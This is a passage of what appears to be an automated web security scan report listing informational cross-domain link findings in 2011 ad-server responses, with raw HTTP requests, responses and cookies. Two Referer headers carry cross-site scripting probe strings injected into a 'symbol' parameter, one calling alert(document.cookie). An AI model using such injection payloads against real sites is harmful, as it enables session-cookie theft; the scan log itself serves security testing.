</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_439566566() {var adCode_439566566=new Array();adCode_439566566.push('<IFRAME SRC="http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.3;sz=120x60;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003H/31000000000039414.1?!&&PID=8013955&UIT=G&TargetID=8303500&AN=439566566&PG=INV4QC&ASID=b03116286f514a64b079940948ad7d98&destination=;ord=439566566?" WIDTH=120 HEIGHT=60 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n');adCode_439566566.push('<scr'+'ipt language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3382.no_url_specifiedOX2487/B5076164.3;abr=!ie;sz=120x60;pc=[TPAS_ID];click=;dcopt=rcl;click0=http:
...[SNIP]...

22.44. http://b.rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://b.rad.redacted/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INVPC3&AP=1455

The response contains the following link to another domain:

http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&&PID=8016549&UIT=G&TargetID=28253486&AN=287916340&PG=INVPC3&ASID=7dc979ca792841188b3b7d4266939e9d&destination=;ord=287916340?

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INVPC3&AP=1455 HTTP/1.1
Host: b.rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; FC06=FB=AgEAYQ4OwAwZ; s_cc=true; s_sq=%5B%5BB%5D%5D; FC02=FB=AgEAYQ4UwAwC

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2710
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8016549-T28253486-C26000000000150232
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 14:48:49 GMT
Content-Length: 2710

//<![CDATA[
function getRADIds() { return{"adid":"26000000000150232","pid":"8016549","targetid":"28253486"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 60);if(paren
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_287916340() {var adCode_287916340=new Array();adCode_287916340.push('<IFRAME SRC="http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&&PID=8016549&UIT=G&TargetID=28253486&AN=287916340&PG=INVPC3&ASID=7dc979ca792841188b3b7d4266939e9d&destination=;ord=287916340?" WIDTH=300 HEIGHT=60 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n');adCode_287916340.push('<scr'+'ipt language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3973.MSN/B4412732.159;abr=!ie;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.
...[SNIP]...

22.45. http://b.rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://b.rad.redacted/ADSAdClient31.dll?GetSAd=&DPJS=0&PN=MSFT&PG=INV4QA&AP=1026

The response contains the following link to another domain:

http://b.ads2.msads.net/CIS/29/000/000/000/004/822.gif

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=0&PN=MSFT&PG=INV4QA&AP=1026 HTTP/1.1
Host: b.rad.redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(1)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 756
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8031597-T8247108-C48000000000031630
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 17:59:17 GMT
Content-Length: 756

//<![CDATA[
function getRADIds() { return{"adid":"48000000000031630","pid":"8031597","targetid":"8247108"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 120, 60);}
tr
...[SNIP]...
<a href="http://g.redacted/2AD0003L/48000000000031630.1??PID=8031597&UIT=G&TargetID=8247108&AN=1930038004&PG=INV4QA&ASID=0dce4f5c66d64ff89775ccb372e6427b" target="_blank"><img src="http://b.ads2.msads.net/CIS/29/000/000/000/004/822.gif" width="120" height="60" alt="Click Here!" border="0" /></a>
...[SNIP]...

22.46. http://b.rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://b.rad.redacted/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INVPC3&AP=1455

The response contains the following link to another domain:

http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&&PID=8016549&UIT=G&TargetID=28253486&AN=2295886&PG=INVPC3&ASID=ec815e38b41240648384113dab579c42&destination=;ord=2295886?

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2676
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8016549-T28253486-C26000000000150232
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 19:28:47 GMT
Content-Length: 2676

//<![CDATA[
function getRADIds() { return{"adid":"26000000000150232","pid":"8016549","targetid":"28253486"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 60);if(paren
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_2295886() {var adCode_2295886=new Array();adCode_2295886.push('<IFRAME SRC="http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&&PID=8016549&UIT=G&TargetID=28253486&AN=2295886&PG=INVPC3&ASID=ec815e38b41240648384113dab579c42&destination=;ord=2295886?" WIDTH=300 HEIGHT=60 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n');adCode_2295886.push('<scr'+'ipt language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3973.MSN/B4412732.159;abr=!ie;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.ms
...[SNIP]...

22.47. http://b.rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://b.rad.redacted/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INV4QC&AP=1026

The response contains the following link to another domain:

http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.3;sz=120x60;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003H/31000000000039414.1?!&&PID=8013955&UIT=G&TargetID=8303500&AN=405471394&PG=INV4QC&ASID=f139fe743c0d4e72bb5ed3de5387bb68&destination=;ord=405471394?

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INV4QC&AP=1026 HTTP/1.1
Host: b.rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC01=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; FC06=FB=AgEAYQ4OwAwZ; FC02=FB=AgEAYQ4UwAwC; FC00=FB=AgEAYQ6guQgB; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2781
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8013955-T8303500-C31000000000039414
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 14:48:54 GMT
Content-Length: 2781

//<![CDATA[
function getRADIds() { return{"adid":"31000000000039414","pid":"8013955","targetid":"8303500"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 120, 60);if(parent
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_405471394() {var adCode_405471394=new Array();adCode_405471394.push('<IFRAME SRC="http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.3;sz=120x60;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003H/31000000000039414.1?!&&PID=8013955&UIT=G&TargetID=8303500&AN=405471394&PG=INV4QC&ASID=f139fe743c0d4e72bb5ed3de5387bb68&destination=;ord=405471394?" WIDTH=120 HEIGHT=60 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n');adCode_405471394.push('<scr'+'ipt language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3382.no_url_specifiedOX2487/B5076164.3;abr=!ie;sz=120x60;pc=[TPAS_ID];click=;dcopt=rcl;click0=http:
...[SNIP]...

22.48. http://b.rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://b.rad.redacted/ADSAdClient31.dll?GetSAd=&DPJS=0&PN=MSFT&PG=INVIHP&AP=1089

The response contains the following links to other domains:

http://clk.redcated/NYC/go/264935949/direct;;wi.300;hi.250/01/
http://redcated/NYC/iview/264935949/direct;;wi.300;hi.250/01?click=
http://redcated/NYC/view/264935949/direct;;wi.300;hi.250/01/

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2407
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: FC00=FB=AgEAYQ6guQgB; expires=Tue, 29-Jan-2013 12:00:00 GMT; domain=.rad.redacted; path=/; HttpOnly
X-RADID: P8128603-T38305882-C117000000000038318
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 13:00:28 GMT
Content-Length: 2407

//<![CDATA[
function getRADIds() { return{"adid":"117000000000038318","pid":"8128603","targetid":"38305882"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);if(par
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_456655314() {var adCode_456655314=new Array();adCode_456655314.push('<iframe src="http://view.atdmt.com/NYC/iview/264935949/direct;;wi.300;hi.250/01?click=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">\n');adCode_456655314.push('<scr'+'ipt language="JavaScript" type="text/javascript">\n');adCode_456655314.push('document.write(\'<a href="http://clk.atdmt.com/NYC/go/264935949/direct;;wi.300;hi.250/01/" target="_blank"><img src="http://view.atdmt.com/NYC/view/264935949/direct;;wi.300;hi.250/01/"/></a>
...[SNIP]...

22.49. http://b.rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://b.rad.redacted/ADSAdClient31.dll?GetSAd=&DPJS=0&PN=MSFT&PG=INV4QB&AP=1026

The response contains the following link to another domain:

http://b.ads2.msads.net/CIS/75/000/000/000/011/300.gif

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=0&PN=MSFT&PG=INV4QB&AP=1026 HTTP/1.1
Host: b.rad.redacted
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; FC06=FB=AgEAYQ4OwAwZ; s_cc=true; s_sq=%5B%5BB%5D%5D; FC02=FB=AgEAYQ4UwAwC

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 754
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8085302-T8295071-C43000000000032622
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 13:00:22 GMT
Content-Length: 754

//<![CDATA[
function getRADIds() { return{"adid":"43000000000032622","pid":"8085302","targetid":"8295071"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 120, 60);}
tr
...[SNIP]...
<a href="http://g.redacted/2AD0003I/43000000000032622.1??PID=8085302&UIT=G&TargetID=8295071&AN=571491259&PG=INV4QB&ASID=592d82eb9bba4dddb5a4cf074ddba79c" target="_blank"><img src="http://b.ads2.msads.net/CIS/75/000/000/000/011/300.gif" width="120" height="60" alt="click here" border="0" /></a>
...[SNIP]...

22.50. http://b.rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://b.rad.redacted/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INV4QC&AP=1026

The response contains the following link to another domain:

http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.3;sz=120x60;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003H/31000000000039414.1?!&&PID=8013955&UIT=G&TargetID=8303500&AN=553650227&PG=INV4QC&ASID=795218be0a4e4bedbb142065adf1af55&destination=;ord=553650227?

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INV4QC&AP=1026 HTTP/1.1
Host: b.rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC01=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; FC06=FB=AgEAYQ4OwAwZ; FC02=FB=AgEAYQ4UwAwC; FC00=FB=AgEAYQ6guQgB; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2781
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8013955-T8303500-C31000000000039414
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 13:00:42 GMT
Content-Length: 2781

//<![CDATA[
function getRADIds() { return{"adid":"31000000000039414","pid":"8013955","targetid":"8303500"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 120, 60);if(parent
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_553650227() {var adCode_553650227=new Array();adCode_553650227.push('<IFRAME SRC="http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.3;sz=120x60;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003H/31000000000039414.1?!&&PID=8013955&UIT=G&TargetID=8303500&AN=553650227&PG=INV4QC&ASID=795218be0a4e4bedbb142065adf1af55&destination=;ord=553650227?" WIDTH=120 HEIGHT=60 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n');adCode_553650227.push('<scr'+'ipt language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3382.no_url_specifiedOX2487/B5076164.3;abr=!ie;sz=120x60;pc=[TPAS_ID];click=;dcopt=rcl;click0=http:
...[SNIP]...

22.51. http://b.rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://b.rad.redacted/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INVPC3&AP=1455

The response contains the following link to another domain:

http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&&PID=8016549&UIT=G&TargetID=28253486&AN=420169787&PG=INVPC3&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=;ord=420169787?

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2710
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8016549-T28253486-C26000000000150232
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 12:56:44 GMT
Content-Length: 2710

//<![CDATA[
function getRADIds() { return{"adid":"26000000000150232","pid":"8016549","targetid":"28253486"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 60);if(paren
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_420169787() {var adCode_420169787=new Array();adCode_420169787.push('<IFRAME SRC="http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&&PID=8016549&UIT=G&TargetID=28253486&AN=420169787&PG=INVPC3&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=;ord=420169787?" WIDTH=300 HEIGHT=60 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n');adCode_420169787.push('<scr'+'ipt language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3973.MSN/B4412732.159;abr=!ie;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.
...[SNIP]...

22.52. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90?http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=860849269?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269?
http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.7;abr=!ie4;abr=!ie5;sz=728x90;ord=860849269?

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90?http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; ATTWL=CollectiveB3; session=1296350849|1296350849

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:29:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3183
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.7;abr=!ie;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
